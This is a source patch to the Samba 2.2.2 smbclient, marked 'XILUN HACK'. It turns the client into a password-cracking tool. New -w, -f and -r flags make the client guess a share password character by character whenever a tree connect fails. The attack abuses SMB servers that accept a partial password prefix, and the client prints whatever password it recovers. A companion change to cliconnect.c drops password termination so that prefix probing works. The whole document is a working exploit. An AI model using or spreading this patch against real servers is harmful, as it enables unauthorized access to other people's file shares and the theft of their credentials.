diff -r -C 2 samba-2.2.2/source/client/client.c samba-2.2.2-peche/source/client/client.c *** samba-2.2.2/source/client/client.c Sat Oct 13 23:09:19 2001 --- samba-2.2.2-peche/source/client/client.c Wed Jan 9 21:46:24 2002 *************** *** 28,31 **** --- 28,37 ---- #endif + /* XILUN HACK */ + static BOOL breakin; + static BOOL get_full_pwd; + static BOOL reversed_scan; + /* XILUN HACK */ + struct cli_state *cli; extern BOOL in_client; *************** *** 1969,1972 **** --- 1975,1984 ---- struct cli_state *do_connect(char *server, char *share) { + /* XILUN HACK */ + unsigned char scanpass[10]; + int way; + int first_char; + int last_char; + /* XILUN HACK */ struct cli_state *c; struct nmb_name called, calling; *************** *** 2072,2079 **** if (!cli_send_tconX(c, sharename, "?????", password, strlen(password)+1)) { ! DEBUG(0,("tree connect failed: %s\n", cli_errstr(c))); ! cli_shutdown(c); ! free(c); ! return NULL; } --- 2084,2134 ---- if (!cli_send_tconX(c, sharename, "?????", password, strlen(password)+1)) { ! /* XILUN HACK */ ! if (!breakin) { ! DEBUG(0,("tree connect failed: %s\n", cli_errstr(c))); ! cli_shutdown(c); ! free(c); ! return NULL; ! } else { ! BOOL found = False; ! c->sec_mode = 0; /**/ ! if (reversed_scan) { ! way = -1; first_char = 0xFF; last_char = 0x20; ! } else { ! way = 1; first_char = 0x20; last_char = 0xFF; ! } ! if (get_full_pwd) { ! int deep; ! for (deep = 0; deep <= 8; deep++) scanpass[deep] = 0; ! for (deep = 0; deep <= 7; deep++) { ! scanpass[deep] = first_char - way; ! while (scanpass[deep] != last_char) { ! scanpass[deep]+=way; ! if (cli_send_tconX(c, sharename, ! "?????", scanpass, deep+1)) ! { found = True; break; } ! } ! if (!found || cli_send_tconX(c, sharename, ! "?????", scanpass, deep+2)) ! break; ! } ! } else { ! scanpass[0] = first_char - way; ! scanpass[1] = 0; ! while (scanpass[0] != last_char) { ! scanpass[0]+=way; ! if (cli_send_tconX(c, sharename, ! "?????", scanpass, 1)) ! { found = True; break; } ! } ! } ! if (!found) { ! DEBUG(0,("Sorry you're dealing with a non broken smb server\n")); ! cli_shutdown(c); ! free(c); ! return NULL; ! } else DEBUG(0,("(Partial) password found : %s\n",scanpass)); ! } ! /* XILUN HACK */ } *************** *** 2138,2141 **** --- 2193,2201 ---- DEBUG(0,("\t-c command string execute semicolon separated commands\n")); DEBUG(0,("\t-b xmit/send buffer changes the transmit/send buffer (default: 65520)\n")); + /* XILUN HACK */ + DEBUG(0,("\t-w connect to host walking around the password\n")); + DEBUG(0,("\t-f display the host full password and connect\n")); + DEBUG(0,("\t-r use reverse order to scan the password\n")); + /* XILUN HACK */ DEBUG(0,("\n")); } *************** *** 2421,2426 **** while ((opt = ! getopt(argc, argv,"s:O:R:M:i:Nn:d:Pp:l:hI:EU:L:t:m:W:T:D:c:b:A:")) != EOF) { switch (opt) { case 's': pstrcpy(servicesf, optarg); --- 2481,2499 ---- while ((opt = ! getopt(argc, argv,"wfrs:O:R:M:i:Nn:d:Pp:l:hI:EU:L:t:m:W:T:D:c:b:A:")) != EOF) { switch (opt) { + /* XILUN HACK */ + case 'w': + breakin = True; + break; + case 'f': + breakin = True; + get_full_pwd = True; + break; + case 'r': + breakin = True; + reversed_scan = True; + break; + /* XILUN HACK */ case 's': pstrcpy(servicesf, optarg); diff -r -C 2 samba-2.2.2/source/libsmb/cliconnect.c samba-2.2.2-peche/source/libsmb/cliconnect.c *** samba-2.2.2/source/libsmb/cliconnect.c Fri Jul 6 04:01:37 2001 --- samba-2.2.2-peche/source/libsmb/cliconnect.c Wed Jan 9 21:45:54 2002 *************** *** 256,260 **** * Non-encrypted passwords - convert to DOS codepage before using. */ ! passlen = clistr_push(cli, pword, pass, -1, STR_CONVERT|STR_TERMINATE); } else { memcpy(pword, pass, passlen); --- 256,263 ---- * Non-encrypted passwords - convert to DOS codepage before using. */ ! if (pass[passlen-1] == 0) ! passlen = clistr_push(cli, pword, pass, -1, STR_CONVERT|STR_TERMINATE); ! else ! passlen = clistr_push(cli, pword, pass, -1, STR_CONVERT); } else { memcpy(pword, pass, passlen);